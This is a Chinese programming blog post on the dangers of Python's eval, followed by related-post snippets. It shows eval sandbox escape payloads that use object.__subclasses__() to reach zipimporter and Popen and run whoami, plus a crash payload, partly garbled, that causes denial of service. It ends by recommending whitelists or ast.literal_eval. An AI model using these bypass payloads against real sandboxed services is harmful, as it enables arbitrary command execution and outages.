python 为什么说eval要慎用

最新推荐文章于 2025-04-23 09:00:34 发布
最新推荐文章于 2025-04-23 09:00:34 发布
阅读量919 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pyjishu/article/details/105386402

这篇文章主要介绍了python 为什么说eval要慎用,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。

In [1]: eval("2+3")
Out[1]: 5
 
In [2]: eval('[x for x in range(9)]')
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]

当内存中的内置模块含有os的话,eval同样可以做到命令执行:

In [3]: import os
 
In [4]: eval("os.system('whoami')")
hy-201707271917\administrator
Out[4]: 0

当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:

In [8]: eval("__import__('os').system('whoami')")
hy-201707271917\administrator
Out[8]: 0

在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞。

安全”使用eval

现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:

Eval函数的声明为eval(expression[, globals[, locals]])

其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。

>>> import os
>>> 'os' in globals()
True
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
>>> eval('os.system('whoami')',{},{})
Traceback (most recent call last):
 File "", line 1, in
 File "", line 1, in
NameError: name 'os' is not defined

如果指定只允许调用abs函数,可以使用下面的写法:

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
 File "", line 1, in
 File "", line 1, in
NameError: name 'os' is not defined
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0

使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!

绕过执行代码1

被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:

env = {}
env["locals"] = None
env["globals"] = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
  
eval(users_str, env)

Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:

>>> def hello():
...  print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi

小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:

>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136

根据乌云drops提到的方法,使用如下代码即可

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

上面的代码首先利用__class__和__subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:

>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0

 和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入

from setuptools import setup, find_packages

然后执行:



python setup.py bdist_egg

就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:

>>> env = {}
>>> env["locals"] = None
>>> env["globals"] = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0

拒绝服务攻击1

object的子类中有很多有趣的东西,执行以下代码查看:

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,Quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类Quitter进行退出:



>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})
 




C:/>

如果运气好,遇到对方程序中导入了os等敏感模块,那么Popen就可以用,并且绕过__builins__为空的限制,例子如下:

>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
  
>>>
正在 Ping 127.0.0.1 具有 32 字节的数据:<br>来自 127.0.0.1 的回复: 字节=32 时间>>

事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用。

拒绝服务攻击2

同样,我们甚至可以绕过__builtins__为None,造成一次拒绝服务攻击,Payload(来自老外blog)如下:

>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

运行上面的代码,Python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是KABOOM,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不淫荡。

总结

从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval。

以上就是本文的全部内容,希望对大家的学习有所帮助。

结尾:

我是一名python开发工程师,整理了一套最新的python系统学习教程,包括从基础的python脚本到web开发、爬虫、数据分析、数据可视化、机器学习,面试宝典。想要这些资料的可以关注小编,加Q裙937963151自取Python学习资料和学习视频,还有大神在线指导哦!

pyjishu
关注
Python eval() 函数看这里就够了
127.0.0.1的博客
10-31 7万+
eval函数Python中具有非常重要的地位,熟练的使用eval函数能够为我们的Python编程提供很多的便利之处。在本文中我将详细记录eval函数Python中的使用方法及它带来便利时带来的一些其他危害,希望您阅读完本文后能够有所收获。欢迎在文章下方留言共同交流学习。
Python eval的用法及注意事项
wuyouxiaoli的博客
02-08 476
evalPython的一个内置函数,这个函数的作用是,返回传入字符串的表达式的结果。想象一下变量赋值时,将等号右边的表达式写成字符串的格式,将这个字符串作为eval的参数,eval的返回值就是这个表达式的结果。 pythoneval函数的用法十分的灵活,但也十分危险,安全性是其最大的缺点。本文从灵活性和危险性两方面介绍eval。 1、强大之处 举几个例子感受一下,字符串与list、tuple、dict的转化。 1 2 3 4 5 6 7
python什么情况下要加eval,为什么必须“执行”? (而不是“ eval”)用于Python导入语句?...
weixin_30531679的博客
01-14 375
I'm trying to run a snippet of Python from within Java, using Jython. If I use an exec statement to import, everything works.PythonInterpreter pi = new PythonInterpreter();pi.exec("import re");Python...
python eval函数:动态执行字符串形式代码的内置函数
最新发布
学亮编程手记
04-23 648
eval的命名直指其“动态求值”的本质,虽强大但需谨慎。现代开发中,更推荐使用安全的替代方案或严格限制其执行环境。
python中的eval函数
热门推荐
菜鸟更要努力呀
07-11 8万+
1 eval函数的简介和语法: eval()函数用来执行一个字符串表达式,并返回表达式的值。还可以把字符串转化为list、tuple、dicteval函数的语法: eval(expression[,globals[,locals]]) 参数: expression:表达式。 globals:变量作用域,如果被提供,必须是一个字典对象。 locals:变量作用域,如果被提供,可以...
python禁用内置函数,Python eval:如果我禁用内置函数属性访问,这仍然很危险吗?...
weixin_39759441的博客
12-23 209
We all know that eval is dangerous, even if you hide dangerous functions, because you can use Python's introspection features to dig down into things and re-extract them. For example, even if you dele...
python进阶之Fraction,pil,Counter,BytesIO,eval妙用......
wc199422的博客
05-10 685
Franction分数库 pil Image图片简单处理 io BytesIO eva函数用来执行一个字符串表达式,并返回表达式的值。
深度辨析 Pythoneval与 exec
lislislislislis的博客
04-06 210
Python 提供了很多内置的工具函数(Built-in Functions),在最新的 Python 3 官方文档中,它列出了 69 个。 大部分函数是我们经常使用的,例如 print()、open() 与 dir(),而有一些函数虽然不常用,但它们在某些场景下,却能发挥出不一般的作用。内置函数们能够被“提拔”出来,这就意味着它们皆有独到之处,有用武之地。 因此,掌握内置函数的用法,就成了我们应...
python考试试卷.docx
09-17
慎用小写字母 l 和大写字母 O,因给他们可能被人错看成数字 1 和 0(D)。 三、 Python 组合数据类型 Python 组合数据类型错误的是(D):Python 的 str、tuple 和 list 类型都属于序列类型(A)。Python 组合数据...
pythoneval函数
weixin_50853979的博客
06-02 8万+
1.eval函数的语法及用法 (1)语法:eval(expression) 参数明 expression:字符串表达式,可为算法,也可为input函数等。 明:表达式必需是字符串,否则会报错,比如直接输入数值会报错为:“TypeError: eval() arg 1 must be a string, bytes or code object”,如下图所示。 (2)作用:接收运行一个字符串表达式,返回表达式的结果值。 2.实例 (1)简单的计算用法 例1:求得2+3得值。 e
python eval()
qq_18668137的博客
01-06 1624
eval(expression, globals=None, locals=None),将字符串str当成有效的表达式来求值并返回计算结果。 example: a = 1 g = {'a':20} eval("a+1",g) result 21   x = 1 y = 1 num1 = eval("x+y") print(num1) def g(): x = 2 ...
pythoneval_eval()函数
weixin_39669769的博客
11-24 376
python内置函数eval(),用来将一个字符串当作python表达式执行,并返回执行结果。比如:>>> a = '[1,2,3,4,5,6]'>>> a'[1,2,3,4,5,6]'>>> alist = eval(a)>>> alist[1, 2, 3, 4, 5, 6]这段代码将一个字符串a,通过eval函数执行,就变成了一个list对象。eval()函数很灵活,我们写的python代码,...
Pythoneval() 函数:动态执行字符串表达式
GitHub_miao的博客
02-22 2671
eval()函数Python 中的一个内置函数,用于动态执行字符串表达式。expression是一个字符串,包含要执行的 Python 表达式。globals是一个可选参数,表示全局命名空间(字典类型)。locals是一个可选参数,表示局部命名空间(字典类型)。eval()函数Python 中一个非常强大且灵活的函数,可以用于动态执行字符串表达式。通过合理地应用eval()函数,可以实现许多有趣和实用的功能,但在使用时需要注意安全性和性能问题。希望本文提供的示例能够帮助大家更好地理解和应用。
python中的 eval 用法
王子老师
12-07 239
python中的eval用法 将字符串中的单引号,双引号去掉 返回 变量-列表-元祖
python eval简介
weixin_38383877的博客
05-10 481
d={"id":1,"name":2} print(d) print(dict({'id':1,'name':2})) # print(dict("{'id':1,'name':2}")) 错误,无法输出 print(dict(eval("{'id':1,'name':2}"))) #eval将字符串转换为字典 输出结果: {‘id’: 1, ‘name’: 2} {‘id’: 1, ‘name’: 2} {‘id’: 1, ‘name’: 2} ...
pythoneval简述
大柠檬的博客
11-27 701
eval()函数Python中出镜率较高,TF中也频频出现。初学时候经常看的一头雾水。根据自己自学经验的查找的资料总结一下: 先Python中它能干啥,怎么用。 函数原型: eval(expression, globals=None, locals=None) 参数:globals和locals是表达式中变量所在的命名空间,一般默认是全局,但是也可以自己指定,globals必须是字典类型的数据...
evalpython中用法_pythoneval的用法是什么
weixin_33883104的博客
03-04 3361
pythoneval的用法:将字符串str当成有效的表达式来求值并返回计算结果,语法为【eval(source[, globals[, locals]]) -> value】。本教程操作环境:windows7系统、python3.9版,DELL G3电脑,该方法适用于所有品牌电脑。pythoneval的用法:python eval() 函数的功能:将字符串str当成有效的表达式来求值并返...
python脚本里可以调用其他python脚本吗
03-29
<think>嗯,用户问的是Python脚本里能不能调用其他Python脚本。这个问题看起来挺基础的,但可能用户刚接触Python,或者想自动化一些任务,需要整合多个脚本。我需要先确定不同的方法,然后解释清楚每种方法的适用场景和注意事项。 首先,常见的几种方法应该是有的。比如用import语句导入模块,这样可以直接调用其他脚本的函数。不过要注意的是,import会执行被导入脚本的顶层代码,可能会有副作用,比如执行了不需要的代码。这时候可能需要用if __name__ == '__main__'来避免。 然后是os.system或者subprocess模块来执行外部命令,这样相当于在子进程中运行另一个脚本。这种方法的好处是可以像在命令行里一样运行,参数传递也方便,但可能效率不高,尤其是需要频繁调用的时候。另外,获取输出可能不太方便,不过subprocess有check_output这样的方法可以获取输出结果。 还有exec或者eval这种动态执行代码的方式,但这样可能会有安全风险,特别是当执行的代码来自不可信来源时。不过如果用户有需要动态生成代码的情况,这可能是个选项,但一般不太推荐。 再考虑一些特殊情况,比如如果被调用的脚本需要不同的Python环境,或者需要传递复杂的参数,这时候可能需要更复杂的处理。比如用subprocess.Popen来管理进程,或者用multiprocessing模块来创建子进程。 用户可能的实际应用场景是什么呢?可能是希望模块化代码,把功能分解到不同的脚本里,或者需要定时任务调用其他脚本,又或者是在大型项目中整合多个组件。需要根据不同的情况推荐合适的方法。 还要注意路径问题,比如当脚本不在同一目录下时,如何正确导入。可能需要修改sys.path或者使用相对路径、绝对路径来处理。另外,循环导入的问题也需要提醒用户注意,避免模块之间相互导入导致错误。 还有,如果用户需要传递数据,比如变量或者对象,直接导入模块的话可以通过函数参数和返回值来传递;用subprocess的话可能需要通过命令行参数、环境变量或者文件/管道来传递数据,这时候可能需要序列化,比如用json或者pickle。 总结一下,应该分点列出不同的方法,每种方法的步骤、优缺点,以及适用场景。同时给出简单的例子,帮助用户理解。还要提醒安全性、效率、路径等问题,确保用户在实际使用时不会遇到常见陷阱。</think>当然可以!在 Python 脚本中调用其他 Python 脚本是常见需求,以下是几种典型方法及其应用场景: --- ### 方法一:通过 `import` 导入模块 **原理**:将目标脚本作为模块导入,直接调用其函数或变量 **步骤**: 1. 确保被调用脚本是一个模块(建议用 `.py` 文件且不含特殊字符命名) 2. 在调用脚本中使用 `import` 导入 3. 通过 `模块名.函数名()` 调用 **示例**: ```python # 被调用脚本:other_script.py def hello(): print("Hello from other script!") # 调用脚本:main.py import other_script other_script.hello() ``` **注意事项**: - 避免在模块顶层写可执行代码(否则导入时会自动执行) - 使用 `if __name__ == '__main__'` 隔离模块测试代码 --- ### 方法二:使用 `os.system` 或 `subprocess` **原理**:通过系统命令执行另一个脚本 **适用场景**:需要独立运行脚本或传递命令行参数 **示例**: ```python import os os.system("python other_script.py") # 简单但功能有限 # 更推荐 subprocess(可捕获输出) import subprocess result = subprocess.run( ["python", "other_script.py"], capture_output=True, text=True ) print(result.stdout) ``` **优点**: - 完全独立进程,避免变量污染 - 可传递复杂参数(如 JSON 字符串) --- ### 方法三:`exec()` 动态执行代码 **原理**:直接读取并执行另一个脚本的代码 **示例**: ```python with open("other_script.py", "r") as f: code = f.read() exec(code) # 执行代码(注意安全风险!) ``` **缺点**: - 存在安全隐患(若代码来源不可信) - 变量可能冲突 --- ### 方法四:`multiprocessing` 多进程调用 **适用场景**:需要并行执行脚本且管理进程 ```python from multiprocessing import Process def run_script(): import other_script other_script.main() if __name__ == '__main__': p = Process(target=run_script) p.start() p.join() ``` --- ### 选择建议 | 方法 | 适用场景 | 注意事项 | |----------------|---------------------------------|----------------------------| | `import` | 需要复用函数/类 | 避免循环导入 | | `subprocess` | 独立进程/命令行参数交互 | 路径需正确 | | `exec` | 动态代码生成(慎用) | 严格校验代码来源 | | `multiprocessing` | 并行计算/资源隔离 | 注意进程间通信复杂度 | --- ### 扩展技巧 - 路径问题:使用 `sys.path.append("路径")` 添加自定义模块路径 - 参数传递:通过 `sys.argv` 接收命令行参数,或使用文件/数据库共享数据 - 环境隔离:建议用虚拟环境(如 `venv`)管理依赖
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值